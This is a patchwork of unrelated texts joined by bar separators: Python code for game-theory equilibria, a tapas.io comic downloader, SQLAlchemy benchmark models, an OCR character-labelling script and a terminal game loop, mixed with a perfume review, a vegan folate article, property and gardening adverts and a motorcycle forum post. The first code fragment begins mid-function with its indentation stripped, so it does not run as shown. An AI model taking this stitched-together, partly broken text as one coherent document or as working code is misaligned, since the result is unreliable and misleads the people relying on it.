for col_name in dimensions_columns_categories_names:
dimensions_matrix[row_name][col_name] = dict()
return dimensions_matrix
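    # With the sample categories defined further below, this builds a nested
    # dict shaped like
    # {'center': {'one': {}, 'two': {}}, 'not center': {'one': {}, 'two': {}}}.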
def calc_payments(dimensions_matrix,payment_conds):
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
# print "first level= "+str(row)+","+str(col)+":"+str(strategy)
for row2 in dimensions_matrix:
dimensions_matrix[row][col][strategy][row2] = dict()
for col2 in dimensions_matrix[row2]:
dimensions_matrix[row][col][strategy][row2][col2] = dict()
for strategy2 in dimensions_matrix[row2][col2]:
dimensions_matrix[row][col][strategy][row2][col2][strategy2] = dict()
# print "second level= "+str(row)+","+str(col)+":"+str(strategy)+str(row2)+","+str(col2)+":"+str(strategy2)
s = strategy
r = strategy2
payment = 0
exec "payment=" + payment_conds[0]
dimensions_matrix[row][col][strategy][row2][col2][strategy2]["val"] = payment
# print "third level= " + str(row) + "," + str(col) + ":" + str(strategy) + str(
# row2) + "," + str(col2) + ":" + str(strategy2)+"="+str(payment)
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
for row2 in dimensions_matrix[row][col][strategy]:
for col2 in dimensions_matrix[row][col][strategy][row2]:
cell_size = len(dimensions_matrix[row][col][strategy][row2][col2])
                            payments_in_cell = [
                                eval(str(dimensions_matrix[row][col][strategy][row2][col2][strategy2]["val"]))
                                for strategy2 in dimensions_matrix[row][col][strategy][row2][col2]]
                            uni_payment = sum([(1 / float(cell_size)) * payment for payment in payments_in_cell])
dimensions_matrix[row][col][strategy][row2][col2]["uniform_payment"] = uni_payment
# print "second level= " + str(row) + "," + str(col) + ":" + str(strategy) + str(
# row2) + "," + str(col2) + ":" + str(len(dimensions_matrix[row][col][strategy][row2][col2]))+",uni="+str(uni_payment)
# dimensions_matrix_copy = dict(dimensions_matrix)
# for row in dimensions_matrix:
# for col in dimensions_matrix[row]:
# strategy = dimensions_matrix[row][col].keys()[0]
# for row2 in dimensions_matrix[row][col][strategy]:
# for col2 in dimensions_matrix[row][col][strategy][row2]:
# if row==row2 and col==col2:
# # a=1
# dimensions_matrix_copy[row][col]["uniform_payment"]= dimensions_matrix[row][col][strategy][row2][col2]["uniform_payment"]
# dimensions_matrix = dict(dimensions_matrix_copy)
return dimensions_matrix
def calc_MD_eq(dimensions_matrix, dimensions_ordered_row, dimensions_ordered_col):
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
is_MD_eq = True
row_index = dimensions_ordered_row.index(row)
if row_index != 0:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][dimensions_ordered_row[row_index - 1]][col][
"uniform_payment"]:
is_MD_eq = False
if row_index != len(dimensions_ordered_row) - 1:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][dimensions_ordered_row[row_index + 1]][col][
"uniform_payment"]:
is_MD_eq = False
col_index = dimensions_ordered_col.index(col)
if col_index != 0:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][row][dimensions_ordered_col[col_index - 1]][
"uniform_payment"]:
is_MD_eq = False
if col_index != len(dimensions_ordered_col) - 1:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][row][dimensions_ordered_col[col_index + 1]][
"uniform_payment"]:
is_MD_eq = False
if is_MD_eq:
dimensions_matrix[row][col][strategy]["is_MD_eq"] = True
else:
dimensions_matrix[row][col][strategy]["is_MD_eq"] = False
return dimensions_matrix
def calc_Global_eq(dimensions_matrix):
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
if dimensions_matrix[row][col][strategy]["is_MD_eq"]:
is_Global_eq = True
for row2 in dimensions_matrix[row][col][strategy]:
if type(dimensions_matrix[row][col][strategy][row2]) != bool:
for col2 in dimensions_matrix[row][col][strategy][row2]:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][row2][col2]["uniform_payment"]:
is_Global_eq = False
if is_Global_eq:
dimensions_matrix[row][col][strategy]["is_Global_eq"] = True
else:
dimensions_matrix[row][col][strategy]["is_Global_eq"] = False
return dimensions_matrix
# some test formulas
payment_conds1 = [
# '=5*log(sin(6)+2)',
# '=5*log(sin(3,7,9)+2)',
# '=3 + 4 * 2 / ( 1 - 5 ) ^ 2 ^ 3',
'=IF(exists(i,j,s_i=r_j),0,IF(LEN(s)=2,3,2))',
# '=IF(foreach(i,j,s_i=r_j),0,IF(LEN(s)=2,3,2))',
# '=IF(foreach(i,s_i=r_i),0,IF(LEN(s)=2,3,2))',
]
# some test formulas
dimensions_conds1 = [
# '=5*log(sin(6)+2)',
# '=5*log(sin(3,7,9)+2)',
# '=3 + 4 * 2 / ( 1 - 5 ) ^ 2 ^ 3',
'=IF(exists(i,s_i=3),"center","not center")',
'=IF(len(s)>1,"two","one")',
# '=IF(foreach(i,j,s_i=r_j),0,IF(LEN(s)=2,3,2))',
# '=IF(foreach(i,s_i=r_i),0,IF(LEN(s)=2,3,2))',
]
#
# payment_conds = encode_conditions(payment_conds)
# print payment_conds
# python_inputs = []
# for i in payment_conds:
# print "**************************************************"
# print "Formula: ", i
# e = shunting_yard(i);
# # print "RPN: ", "|".join([str(x) for x in e])
# G, root = build_ast(e)
# python_inputs += [root.emit(G, context=None)]
# print "Python code: ", root.emit(G, context=None)
# print "**************************************************"
#
#
# print python_inputs
# payment_conds = parse_conditions(payment_conds1)
# print payment_conds
# print decode_conditions(python_inputs)
# dimensions_conds = parse_conditions(dimensions_conds)
# print dimensions_conds
# s = [2, 3]
# exec "print " + dimensions_conds[0]
strategies_vector1 = [[1], [2], [3], [4], [5], [1, 2], [2, 3], [3, 4], [4, 5]]
dimensions_rows_categories_names1 = {"dimensions_row_category_name_1": "center",
"dimensions_row_category_name_2": "not center"}
dimensions_columns_categories_names1 = {"dimensions_column_category_name_1": "one",
"dimensions_column_category_name_2": "two"}
dimensions_ordered_row1 = ["center", "not center"]
dimensions_ordered_col1 = ["one", "two"]
dimensions_rows_conds1 = [dimensions_conds1[0]]
dimensions_columns_conds1 = [dimensions_conds1[1]]
def full_calc(strategies_vector, dimensions_rows_conds, dimensions_columns_conds, dimensions_rows_categories_names,
dimensions_columns_categories_names, dimensions_ordered_row, dimensions_ordered_col,payment_conds):
dimensions_rows_conds = parse_conditions(dimensions_rows_conds)
dimensions_columns_conds = parse_conditions(dimensions_columns_conds)
payment_conds = parse_conditions(payment_conds)
dimensions_matrix = create_dimensions_matrix(dimensions_rows_categories_names,
dimensions_columns_categories_names)
print str(dimensions_matrix)
dimensions_matrix = classify_strategies_to_dimensions(strategies_vector, dimensions_matrix,
dimensions_rows_conds,
dimensions_columns_conds)
print dimensions_matrix
dimensions_matrix = calc_payments(dimensions_matrix,payment_conds)
print "\n calc global eq"
print "*************************************"
dimensions_matrix = calc_MD_eq(dimensions_matrix, dimensions_ordered_row, dimensions_ordered_col)
dimensions_matrix = calc_Global_eq(dimensions_matrix)
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
print str(row) + "," + str(col) + ":" + str(dimensions_matrix[row][col][strategy]["is_Global_eq"])
print "\n calc MD eq"
print "*************************************"
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
print str(row) + "," + str(col) + ":" + str(dimensions_matrix[row][col][strategy]["is_MD_eq"])
full_calc(strategies_vector1, dimensions_rows_conds1, dimensions_columns_conds1,
dimensions_ordered_row1, dimensions_ordered_col1, dimensions_ordered_row1,
dimensions_ordered_col1,payment_conds1)
# for row in dimensions_matrix:
# for col in dimensions_matrix[row]:
# for strategy in dimensions_matrix[row][col]:
# print str(row) + "," + str(col) + ":" +str(dimensions_matrix[row][col][strategy]["is_Global_eq"])
# def calc_payments(dimensionized_conditions):
# for strategy in dimensionized_conditions:
|
I’m not really a fragrance person, but this Jo Loves scent in Pomelo is beautiful! It’s my go-to scent and I love how fresh and fruity it smells. I absolutely adore all of the Jo Loves scents, but this is probably one of my favourites!
This mouth-watering, Grapefruit-infused citrus is instantly refreshing and quickly gaining cult status.
Each scent is carefully crafted by Jo before receiving a single red dot – her creative signature and seal of integrity. |
#!/bin/env python3
from pyquery import PyQuery as pq
from pathlib import Path
import os
import argparse
import re
import requests
def lead0(num, max):
return str(num).zfill(len(str(max)))
def terminal_size():
try:
import fcntl
import termios
import struct
th, tw, hp, wp = struct.unpack('HHHH', fcntl.ioctl(0, termios.TIOCGWINSZ, struct.pack('HHHH', 0, 0, 0, 0)))
except (IOError, ModuleNotFoundError):
th, tw = 80, 200
return tw, th
def printLine(msg='', noNewLine=False):
terminalWidth = terminal_size()[0]
spaces = terminalWidth - len(msg)
if noNewLine:
if args.verbose:
print(' ' + msg + (' ' * (spaces - 1)))
else:
print(msg + (' ' * spaces), end='\r')
else:
print(msg + (' ' * spaces))
def check_path(path, slash=True, fat=False):
evil_chars = []
if slash:
evil_chars.append('/')
if fat:
evil_chars += ['?', '<', '>', '\\', ':', '*', '|', '"', '^']
return ''.join([char for char in path if char not in evil_chars])
# parse input and set up help
parser = argparse.ArgumentParser(description='Downloads comics from \'https://tapas.io\'.\nIf the folder of a downloaded comic is found, it will only be updated (can be disabled with -f/--force).', formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('url', metavar='URL/name', type=str, nargs='+',
                    help='URL or URL name of the comic\nGo to the comic you want to download (any page)\nRight-click the comic name in the upper left corner and select "Copy link address" (or similar), or just use the name after "series/" in the URL\nExamples: https://tapas.io/series/Erma, RavenWolf, ...')
parser.add_argument('-f', '--force', action="store_true", help='Disables updater.')
parser.add_argument('-v', '--verbose', action="store_true", help='Enables verbose mode.')
parser.add_argument('-c', '--restrict-characters', action="store_true", help='Removes \'? < > \\ : * | " ^\' from file names')
parser.add_argument('-o', '--output-dir', type=str, nargs='?', default="", dest='baseDir', metavar='C:\\',
help='Output directory where comics should be placed.\nIf left blank, the script folder will be used.')
args = parser.parse_args()
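# Example invocations (assuming the script is saved as tapas-dl.py; the output
# directory is illustrative):
#   python3 tapas-dl.py https://tapas.io/series/Erma
#   python3 tapas-dl.py RavenWolf -o ./comics -c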
basePath = ""
if (args.baseDir):
basePath = Path(args.baseDir)
for urlCount, url in enumerate(args.url):
# check url/name
if re.match(r'^https://tapas\.io/series/.+$', url):
urlName = url[url.rindex('/') + 1:]
else:
urlName = url
printLine('Loading ' + urlName + '...', True)
    # Get comic start page and test whether the comic exists
    pageRequest = requests.get('https://tapas.io/series/' + urlName, headers={'user-agent': 'tapas-dl'})
    if pageRequest.status_code != 200:
        printLine('Error: Comic "{}" not found\n'.format(urlName))
        break
    page = pq(pageRequest.text)
name = page('.center-info__title.center-info__title--small').text()
author = page('div.viewer-section.viewer-section--episode a.name').text()
seriesId = page('.subscribe-btn').attr('data-id')
if len(page('.row-item--info > img')) > 0:
headerSrc = page('.row-item--info > img').attr('src')
else:
headerSrc = None
data = []
page = pq(requests.get(f'https://tapas.io/series/{seriesId}/episodes?page=1&sort=OLDEST&max_limit=99999999', # It's over 9000! But I love that they forgot to limit the max_limit, because that means I don't have to bother with pagination ^^
headers={'user-agent': 'tapas-dl'}).json()['data']['body'])
for episode in page('[data-permalink*="/episode/"]'):
data.append({'id': int(episode.attrib['data-permalink'][episode.attrib['data-permalink'].rfind('/') + 1:])})
printLine('{} [{}] ({} pages):'.format(name, urlName, len(data)))
    # Check if folder exists; if not, create it
printLine('Checking folder...', True)
# If the user specified a base output directory, prepend that on our folder
savePath = check_path('{} [{}]'.format(name, urlName), fat=args.restrict_characters)
if (basePath != ""):
savePath = os.path.join(basePath, savePath)
printLine('Full path is: ' + str(savePath))
if os.path.isdir(savePath) and not args.force:
printLine('Found directory, only updating (use -f/--force to disable)')
filesInDir = list(os.scandir(savePath))
fileNames = []
for fileInDir in filesInDir:
fileNames.append(fileInDir.name)
fileNames.sort()
imgOffset = len(fileNames)
if imgOffset > 1:
lastFile = fileNames[-1]
lastPageId = int(lastFile[lastFile.rindex('#') + 1:lastFile.rindex('.')])
pageOffset = next(i for i, page in enumerate(data) if page['id'] == lastPageId) + 1
data = data[pageOffset:]
else:
pageOffset = 0
else:
if not os.path.isdir(savePath):
os.mkdir(savePath)
printLine('Creating folder...', True)
pageOffset = 0
imgOffset = 0
# Download header
if True not in [file.name.startswith('-1 - header.') for file in os.scandir(savePath)]:
printLine('Downloading header...', True)
if headerSrc is not None:
with open(os.path.join(savePath, '-1 - header.{}'.format(headerSrc[headerSrc.rindex('.') + 1:])), 'wb') as f:
f.write(requests.get(headerSrc).content)
printLine('Downloaded header')
else:
printLine('Header not found')
if len(data) <= 0:
        print('Nothing to do: no pages found or all pages already downloaded\n')
continue
# Check if series is comic or novel
if len(pq(f'https://tapas.io/episode/{data[0]["id"]}', headers={'user-agent': 'tapas-dl'})('.content__img.js-lazy')) > 0:
printLine('Detected comic')
# Get images from page from JS api
allImgCount = 0
for pageCount, pageData in enumerate(data):
# Test whether the page we have in mind is reachable
        pageRequest = requests.get(f'https://tapas.io/episode/{pageData["id"]}', headers={'user-agent': 'tapas-dl'})
        if pageRequest.status_code != 200:
            # This page was unavailable. Let the user know and add a single dummy image entry.
            # (We will check for this when we go to download images.)
            printLine('Error: "{}" page {}/{} not found. Page request yielded: {} (Early Access page?)'.format(urlName, pageCount + pageOffset, len(data) + pageOffset, str(pageRequest.status_code)), True)
pageData['title'] = "PageUnavailable"
pageData['imgs'] = []
pageData['imgs'].append("PageUnavailable")
else:
# If the page did not yield an access error, go ahead and scrape for image entries.
pageHtml = pq(url=f'https://tapas.io/episode/{pageData["id"]}', headers={'user-agent': 'tapas-dl'})
printLine('Downloaded image data from {} images (pages {}/{})...'.format(allImgCount, pageCount + pageOffset, len(data) + pageOffset), True)
pageData['title'] = pageHtml('.info__title').text()
pageData['imgs'] = []
for img in pageHtml('.content__img'):
pageData['imgs'].append(pq(img).attr('data-src'))
allImgCount += 1
# Download images
imgCount = 0
for pageCount, pageData in enumerate(data):
for imgOfPageCount, img in enumerate(pageData['imgs']):
# Check if the first image entry is the dummy text that indicates the page was unavailable when we tried to scrape it.
if pageData['imgs'][0] != "PageUnavailable":
# If the entry isn't a dummy entry, go ahead and download the images it contains.
with open(os.path.join(savePath, check_path('{} - {} - {} - {} - #{}.{}'.format(lead0(imgCount + imgOffset, allImgCount + imgOffset), lead0(pageCount + pageOffset, len(data) + pageOffset),
lead0(imgOfPageCount, len(pageData['imgs'])), pageData['title'], pageData['id'], img[img.rindex('.') + 1:]),
fat=args.restrict_characters)), 'wb') as f:
f.write(requests.get(img).content)
imgCount += 1
printLine('Downloaded image {}/{} from page {}/{} ({}/{} images)...'.format(imgOfPageCount + 1, len(pageData['imgs']), pageCount + pageOffset, len(data) + pageOffset, imgCount + imgOffset, allImgCount + imgOffset), True)
else:
# If the entry was a dummy entry, skip it and let the user know.
printLine('Error: No images downloaded from page {}/{}.'.format(pageCount + pageOffset, len(data) + pageOffset), True)
if data != []:
printLine('Downloaded {} of {} images'.format(imgCount, allImgCount))
else:
printLine('Nothing to do')
if urlCount + 1 != len(args.url):
printLine()
else:
printLine('Detected novel')
from ebooklib import epub
# download/create epub
book = epub.EpubBook()
customCss = None
# Add meta data
book.set_identifier(urlName)
book.set_title(name)
book.set_language('en')
book.add_author(author)
header_name = os.path.join(savePath, list(filter(re.compile(r'.+header\..+').match, os.listdir(savePath)))[0])
book.set_cover("cover.jpg", open(header_name, 'rb').read())
book.toc = []
book.spine = ['cover']
# create about page
chapter = epub.EpubHtml(title='about', file_name='about.xhtml')
chapter.content = f'<h1>About</h1><p>Title: {name}</p><p>Author: {book.metadata["http://purl.org/dc/elements/1.1/"]["creator"][0][0]}</p><p>Source: <a href="{"https://tapas.io/series/" + urlName}">{"https://tapas.io/series/" + urlName}</a></p>'
book.add_item(chapter)
book.spine.append(chapter)
# Append nav page
book.spine.append('nav')
# create chapters
for pageCount, pageData in enumerate(data):
printLine('Downloaded page {}/{}...'.format(pageCount + 1, len(data)), True)
pagePq = pq(url='https://tapas.io/episode/' + str(pageData['id']), headers={'user-agent': 'tapas-dl'})
pageTitle = pagePq('.viewer__header > .title').text()
pageHtml = f'<h1>{pageTitle}</h1>'
for p in pagePq('article.viewer__body > div.ep-epub-content > div.body > p'):
p = pq(p)
if p.text() is not None:
pageHtml += '<p>' + p.text() + '</p>'
chapter = epub.EpubHtml(title=pageTitle, file_name=str(pageData['id']) + '.xhtml')
chapter.content = pageHtml
book.add_item(chapter)
# define Table Of Contents
book.toc.append(epub.Link(str(pageData['id']) + '.xhtml', pageTitle, str(pageData['id'])))
# basic spine
book.spine.append(chapter)
# add default NCX and Nav file
book.add_item(epub.EpubNcx())
book.add_item(epub.EpubNav())
# add CSS
style = ''
nav_css = epub.EpubItem(uid="style_nav", file_name="style/nav.css", media_type="text/css", content=style)
book.add_item(nav_css)
# write to the file
epub.write_epub(os.path.join(os.path.dirname(savePath), check_path(f'{name}.epub', fat=args.restrict_characters)), book)
# remove tmp folder
for file in os.listdir(savePath):
os.remove(os.path.join(savePath, file))
os.removedirs(savePath)
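For orientation, the args.* references above (args.url, args.force, args.restrict_characters) imply an argparse setup roughly like the sketch below. This is a hedged reconstruction, not the script's verified interface: only -f/--force is confirmed by the update message earlier; the other flag spellings and the -o/--output flag feeding basePath are assumptions.

import argparse

parser = argparse.ArgumentParser(description='Download series from tapas.io')
parser.add_argument('url', nargs='+', help='series URLs or slugs')
parser.add_argument('-f', '--force', action='store_true',
                    help='redownload everything instead of only updating')
parser.add_argument('-r', '--restrict-characters', action='store_true',
                    help='restrict file names to FAT-safe characters')
parser.add_argument('-o', '--output', default='',
                    help='base output directory (hypothetical flag feeding basePath)')
args = parser.parse_args()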
|
This World Health Day, Vegan Society Dietitian Heather Russell collaborates with charity Shine to explain what vegans need to know about this B vitamin.
Folate and folic acid are both forms of vitamin B9. Folate is the type that occurs naturally in foods and in the body, whereas folic acid is the version found in fortified foods and supplements.
Data from the EPIC-Oxford study, which compares different dietary groups, showed that vegan participants had the highest levels of folate in their blood. However, being vegan is no guarantee that you’re getting enough folate! Make sure that your diet is rich in this nutrient by including good sources daily, such as leafy greens, beans, peas and lentils. Oranges, beetroot, quinoa, mango, asparagus, avocado, okra, parsnips, chia seeds and ground linseed (flaxseed) also contain useful amounts of folate.
The Vegan Society’s recommendations about vitamin B12 are designed to keep down the level of homocysteine in the bloodstream as well as to prevent vitamin B12 deficiency symptoms. Elevated homocysteine has been linked to higher risks of heart and blood vessel disease and pregnancy complications. Research suggests that elevated homocysteine is a significant issue within the vegan community.
Homocysteine levels are affected by other nutrients, most notably folate/folic acid. Our VEG 1 supplement contains extra B vitamins, including folic acid, which ensure that the vitamin B12 can do its job.
It’s a good idea for women of childbearing age to use a folic acid supplement of 400 micrograms as nearly half of all pregnancies are unplanned and folic acid greatly reduces the risk of a baby developing birth defects like spina bifida. The oral contraceptive pill depletes folate levels in the body, increasing the need to take a precautionary folic acid supplement. Without supplementation, expectant mothers are also at risk of anaemia due to the increased folate needs of the developing baby. For maximum protection, folic acid should be taken eight weeks prior to conception and during the first trimester. According to Shine, only 31% of women take the right dose at the right time, with many more not starting until they’re already pregnant, when it’s too late.
Is it safe to take 400 micrograms of folic acid in addition to the 200 micrograms found in VEG 1?
Is there such a thing as too much folate/folic acid?
There’s no upper limit for our intakes of folate found in foods like leafy greens, beans, peas and lentils. For adults, there is a daily upper limit of 1000 micrograms for the amount of folic acid obtained from fortified foods and supplementation. This also applies during pregnancy unless you’re receiving medical advice about high dose supplementation, which may be needed by those who have a family history of birth defects, have a high body mass index, have diabetes or take anti-epilepsy medication.
It’s good to be aware that the government is considering mandatory fortification of flour with folic acid, which has the potential to improve the folic acid status and health of our nation, including a reduction in the number of pregnancies affected by neural tube defects. This nutritional strategy is supported by Shine and our partner the British Dietetic Association. |
"""
Benchmark models.
"""
import psycopg2
from sqlalchemy import create_engine, MetaData, Column, Integer, String
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import QueuePool
from sqlalchemy.ext.declarative import declarative_base
def get_conn():
return psycopg2.connect(
user='benchmarkdbuser',
password='benchmarkdbpass',
host='tfb-database',
port='5432',
database='hello_world')
conn_pool = QueuePool(get_conn, pool_size=100, max_overflow=25, echo=False)
pg = create_engine('postgresql://', pool=conn_pool)
DBSession = sessionmaker(bind=pg)()
metadata = MetaData()
DatabaseBase = declarative_base()
class World(DatabaseBase):
__tablename__ = 'world'
id = Column('id', Integer, primary_key=True)
randomNumber = Column(
'randomnumber', Integer, nullable=False, server_default='0')
def __json__(self, request=None):
return {'id': self.id, 'randomNumber': self.randomNumber}
class Fortune(DatabaseBase):
__tablename__ = 'fortune'
id = Column('id', Integer, primary_key=True)
message = Column('message', String, nullable=False)
def __json__(self):
return {'id': self.id, 'message': self.message}
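A minimal usage sketch, not part of the benchmark itself: fetch one random World row through the session configured above and serialize it the way a JSON endpoint would. It assumes the hello_world database behind get_conn() is reachable and, per the benchmark convention, holds rows with ids 1 to 10000.

import json
import random

if __name__ == '__main__':
    world = DBSession.query(World).get(random.randint(1, 10000))
    print(json.dumps(world.__json__()))
    DBSession.close()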
|
Today, we’re going to discuss value at the higher end of the market. Throughout Connecticut we’re seeing the same thing, especially at the local level: homes priced in the upper echelon offer tremendous value.
For example, we have a listing at 15 Taunton Lane in Newtown, Connecticut that is priced just under $1 million. Eight years ago, the property sold for $1.3 million. The original builder bought it back and reconditioned the entire property before putting it back on the market.
We’re seeing this kind of value across the market; prices are not depreciating. If you’re looking to get into a beautiful, larger home, now might be your time.
# coding: u8
from hashlib import md5 as _m5
from itertools import izip
import cPickle as pickle
import os
import time
from PIL import Image
import Levenshtein
md5 = lambda s: _m5(s).hexdigest()
class Otsu(object):
FAST_VAL = 255 # any non-zero value works
BINARY_THRESHOLD = 190 # binarization threshold
def __init__(self, path=None, im=None):
if im is None:
self.open_image(path)
else:
self.im = im
self.w, self.h = self.im.size
def get_vertical_projection(self, fast=True, rotate=False):
u'''Get the vertical projection of the binarized image.
Returns a list of projection data; each entry is the number of pixels
with value 0 in the corresponding column.
If fast is True, a column is abandoned as soon as one character pixel is
found in it. Note: the values in graph are then 0 or FAST_VAL, not totals.
'''
im = self.im.transpose(Image.ROTATE_90) if rotate else self.im
pixels = im.load()
w, h = im.size
graph = [0] * w
for x in range(w):
for y in range(h):
pixel = pixels[x, y]
if pixel == 0: # this column contains part of a character
if fast: # mark the column and skip the rest of it
graph[x] = self.FAST_VAL
break
else:
graph[x] += 1
return graph
def show_vertical_projection(self, graph):
w = len(graph)
h = max(graph)
img = Image.new('1', (w, h))
for x in range(w):
for y in range(h):
if y <= graph[x]:
img.putpixel((x, y), 255)
else:
break
# The graph is drawn from the top-left corner; flip it vertically for easier viewing
img.transpose(Image.FLIP_TOP_BOTTOM).show()
return self
def open_image(self, path):
im = Image.open(path)
self.im = im.convert('L') # grayscale
self.im = self.im.point(
lambda p: p > self.BINARY_THRESHOLD and 255) # binarize
return self
def cut_to_lines(self, rotate=True, show=False):
u"""将二值图片按行切割。
原理:按照图片旋转90度后的垂直投影图切割。
"""
graph = self.get_vertical_projection(fast=True, rotate=rotate)
if show:
self.show_vertical_projection(graph)
if len(set(graph)) == 1: # all values are 0, i.e. the image contains no text
return
starts = [] # indexes where each run of FAST_VAL begins
ends = [] # indexes where each run of FAST_VAL ends
# e.g. graph = [0, 0, 255, 255, 255, 0, 0, 0, 255, 255, 0, 255, 0, 0]
# gives starts == [2, 8, 11] and ends == [4, 9, 11]
char = self.FAST_VAL # currently searching for FAST_VAL
for i, v in enumerate(graph):
if v == char:
# toggle the search target
if char == self.FAST_VAL: # found the first FAST_VAL of a run
char = 0
starts.append(i)
else: # just passed the last FAST_VAL of the run
char = self.FAST_VAL
ends.append(i - 1) # i is the position of the 0, so i - 1 is the last FAST_VAL
if 0 and not rotate: # disabled experiment, kept for reference
# Merge left-right character components that were split apart.
# The gap inside such a compound character is small; gaps narrower
# than N px are treated as part of one character.
N = 2
new_starts = []
new_ends = []
last_s = last_e = 0
def push(start, end):
new_starts.append(start)
new_ends.append(end)
for start, end in izip(starts, ends):
if last_s == 0:
push(start, end)
elif start - last_e < N:
new_ends[-1] = end
else:
push(start, end)
last_s, last_e = start, end
starts, ends = new_starts, new_ends
i = 1
for start, end in izip(starts, ends):
# graph was built from the 90-degree-rotated image, so its indexes are y coordinates of the original image
if rotate:
box = (0, start, self.w, end)
else:
box = (start, 0, end, self.h)
yield self.im.crop(box), i
i += 1
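A minimal non-interactive sketch of how the class above is meant to be used: cut a page into lines, then each line into characters, and save the crops. The paths are hypothetical and the output directory is assumed to exist.

def demo(path='/tmp/page.png'):
    page = Otsu(path) # opens, grayscales and binarizes the image
    for line, line_num in page.cut_to_lines():
        # cut each line image into individual characters
        for char_img, col_num in Otsu(im=line).cut_to_lines(rotate=False):
            char_img.save('/tmp/cut/%d_%d.png' % (line_num, col_num))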
if __name__ == '__main__':
import glob
glob.glob('./imgs/*.jpg')
otsu = Otsu('/home/finn/rubbish/ocr/test-10001.bmp')
#otsu.im.show()
i = 1000
def update(m5, char):
a = samples[m5]
a[-1] = char
samples[m5] = a
pickle_file = 'data.pickle'
samples = pickle.load(open(pickle_file, 'rb'))
bak_pickle_file = '%s._%d_%s' % (pickle_file, time.time(), '.bak')
open(bak_pickle_file, 'wb').write(open(pickle_file, 'rb').read())
"""
for fn in glob.glob('./cls/*.png'):
m5, char = fn.split('.')[1].split('/')[-1].split('_')
samples[m5] = [char, char, char]
"""
update('0538fd2620d99c82ea1627987d7c4e96', '偕-l')
for line, line_num in otsu.cut_to_lines():
#line.show()
line.save('/tmp/cut/0000000_cur_line.png')
otsu = Otsu(im=line)
for word, col_num in otsu.cut_to_lines(rotate=False, show=0):
_word = word
word = word.resize((48, 48), Image.BICUBIC).convert('1')
data = ''.join(str(p) for p in word.getdata()).replace('255', '1')
m5 = md5(data)
if m5 not in samples:
# Keep the /tmp/cut directory open; it makes manual labelling easier
path = '/tmp/cut/%s.%s_%s.png' % (line_num, col_num, m5)
word.save(path)
min_distance = len(data)
maybe = None
for key, value in samples.items():
binary_string = value[-2]
try:
distance = Levenshtein.hamming(binary_string, data)
except:
# Length mismatch: drop the stale sample and skip it.
# (samples.items() returns a list in Python 2, so deleting here is safe.)
del samples[key]
continue
if min_distance > distance:
maybe = value
min_distance = distance
maychar = maybe[-1]
print 'maybe:', maychar, min_distance
char = raw_input('input(press RETURN to accept %s):' % maychar)
if char == '':
char = maychar
os.remove(path)
os.system('clear')
samples[m5] = [word.tostring(), data, char]
pickle.dump(samples, open(pickle_file, 'wb'))
path = 'cls/%s_%s.png' % (m5, char)
_word.save(path)
else:
char = samples[m5][-1]
#samples[m5] = [word.tostring(), data, char]
print m5, char
path = 'cut/%s.%s_%s_%s.png' % (line_num, col_num, m5, char)
_word.save(path)
i += 1
|
Are you in need of great value Garden Hedge in Kings Cross Central London N1C?
Looking for an efficient yet affordable Garden Hedge service for your outdoor area in St. Pancras Station, London, N1C?
Choose our Garden Hedge company in Kings Cross Central London N1C and we will do all your gardening chores with ease. Our gardeners will provide you with a cost-effective Garden Hedge service of outstanding quality.
From one-off landscaping services to regular lawn mowing in Kings Cross Central London N1C, we can offer you a wide variety of services. Contact our knowledgeable team over the phone or via email and we will give you a free no-obligation quote. It is easy to book our efficient Kings Cross Central London N1C gardening services online – all you need to do is complete the form on our contact page. After you share your gardening requirements with our team and agree on the price for your job, our Garden Hedge gardeners will show up at your address in Kings Cross Central London N1C to finish the task.
#!/usr/bin/env python
# Copyright (c) 2016 Matt Struble. All Rights Reserved.
#
# Use is subject to license terms.
#
# Author: Matt Struble
# Date: Aug. 31 2016
import time, os
from graphics.graphicsdevice import GraphicsDevice
from inputs import Keyboard, Keys
class Game:
""" Handles initialization and core game loop. """
FPS = 30.0
SEC_PER_FRAME = 1.0/FPS
def __init__(self, w='1000', h='300', title='Game'):
self.gd = GraphicsDevice(w, h, title)
self.run()
def run(self):
self._initialize()
self._loadContent()
self._loop()
def _initialize(self):
Keyboard.initialize()
self.running = True
def _terminate(self):
Keyboard.terminate()
self.running = False
def _loadContent(self):
pass
def _loop(self):
previous = time.time()
while self.running:
current = time.time()
dt = current - previous
previous = current
self._processInput()
self._update(dt)
self._render()
sleepTime = self.SEC_PER_FRAME - ( time.time() - current )
if sleepTime > 0:
time.sleep( sleepTime )
def _processInput(self):
if Keyboard.released(Keys.ESCAPE):
self._terminate()
def _update(self, dt):
Keyboard._update()
def _render(self):
# Clear terminal buffer
#os.system('cls' if os.name == 'nt' else 'clear')
print Keyboard.getKeyboardString()
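A minimal sketch of driving the loop above: subclass Game and override the hook methods. The class and method names come from this file; everything else is illustrative. Note that __init__ calls run() itself, so constructing the object starts the loop.

class DemoGame(Game):
    def _loadContent(self):
        self.elapsed = 0.0

    def _update(self, dt):
        Keyboard._update()
        self.elapsed += dt

    def _render(self):
        print 'running for %.1f seconds' % self.elapsed

#DemoGame() # uncomment to run; ESC exits via _processInput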
|
My local dealer just quoted me $100 for a shop manual and said they'd have to special order it.
Thanks a million for putting the link to the free PDF in the knowledge stickies.
If I can find a DIY brain cell somewhere, this forum is going to save me a fortune!
Welcome aboard! You're off to a good start. The knowledge base here is nothing short of great. Lots of gearheads, motorheads, professional engineers, mechanics, designers, racers hang out here. It's a great motorcycle and these folks are dedicated to making it the best that it can be.
I came aboard about 2 months ago....yes this forum is awesome.
